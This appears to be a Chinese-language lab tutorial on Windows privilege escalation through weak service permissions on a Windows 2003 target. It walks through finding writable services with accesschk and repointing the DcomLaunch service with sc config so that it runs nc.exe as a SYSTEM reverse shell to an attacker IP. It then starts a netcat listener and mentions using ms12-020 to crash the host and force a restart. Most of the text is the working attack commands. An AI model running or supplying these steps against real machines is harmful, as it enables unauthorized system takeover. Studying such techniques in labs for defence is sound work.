用到的工具:accesschk布隔,這個(gè)工具可以用來檢查用戶和用戶組對(duì)文件离陶,目錄,注冊(cè)表項(xiàng)衅檀,全局對(duì)象和系統(tǒng)服務(wù)的權(quán)限招刨,在實(shí)際配置權(quán)限過程中,如果權(quán)限設(shè)置不當(dāng)哀军,那么win服務(wù)就可能被用于提權(quán)计济。
下載鏈接:
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
具體介紹:http://blog.51cto.com/rangercyh/497497
第一次運(yùn)行會(huì)出現(xiàn)一個(gè)許可彈窗,可以執(zhí)行 accesschk.exe /accepteula 來避免彈窗
實(shí)驗(yàn)環(huán)境 :
靶機(jī): win2003 sp2 IP:192.168.133.130
攻擊機(jī): win7 IP:192.168.133.128
在靶機(jī)添加一個(gè)用戶test排苍,并加入到本地組power users組中
執(zhí)行命令:
accesschk.exe -uwcqv "Power Users" *
來顯示Power User組可以操作的服務(wù)名稱信息
-u :抑制錯(cuò)誤
-w:僅顯示具有寫訪問權(quán)限的對(duì)象
-c:顯示服務(wù)名稱沦寂,輸入* 用戶與顯示所有服務(wù)
-q:省略標(biāo)識(shí)
-v:冗長(zhǎng)(包括WINDOUWS VISTA完整性級(jí)別)
前面的RW表示有讀寫權(quán)限,其中服務(wù)名稱為“DcomLaunch”和“kdc”服務(wù)可以被simeon用戶操作
這里我選“DcomLaunch” 進(jìn)行測(cè)試
然后使用“sc qc DcomLaunch”命令查詢DcomLaunch的詳細(xì)信息
可以看到是以系統(tǒng)權(quán)限運(yùn)行的
然后我們?cè)诳聪率欠駟?dòng)了 net start | find "DCOM Server Process Launcher"
說明服務(wù)是啟動(dòng)的
然后在獲取這個(gè)服務(wù)名稱提供的服務(wù)
運(yùn)行 tasklist /svc 找到對(duì)應(yīng)服務(wù)
接下來就是修改服務(wù)并獲取系統(tǒng)權(quán)限
這里我們還要配置使用nc反彈shell到我的攻擊機(jī)上
我們把nc放到c:\windows\temp目錄下
使用sc對(duì)服務(wù)進(jìn)行修改
sc config DcomLaunch binpath= "C:\windows\temp\nc.exe" -nv 192.168.193.131 4433 -e "C:\WINDOWS\system32\cmd.exe"
*注意binpath=后面一定要有個(gè)空格
我們?cè)诓樵兿路?wù)
obj:指定運(yùn)行服務(wù)將使用的帳戶名淘衙,或指定運(yùn)行驅(qū)動(dòng)程序?qū)⑹褂玫?Windows 驅(qū)動(dòng)程序?qū)ο竺亍DJ(rèn)設(shè)置為 LocalSystem。
password:指定一個(gè)密碼彤守。如果使用了非 LocalSystem 的帳戶毯侦,則此項(xiàng)是必需的。
最后使用 net start DcomLaunch 命令(也可以用ms12-020打藍(lán)屏)重啟這個(gè)服務(wù)
攻擊機(jī)上用nc進(jìn)行監(jiān)聽4433即可得到反彈的shell
nc -lvvp 4433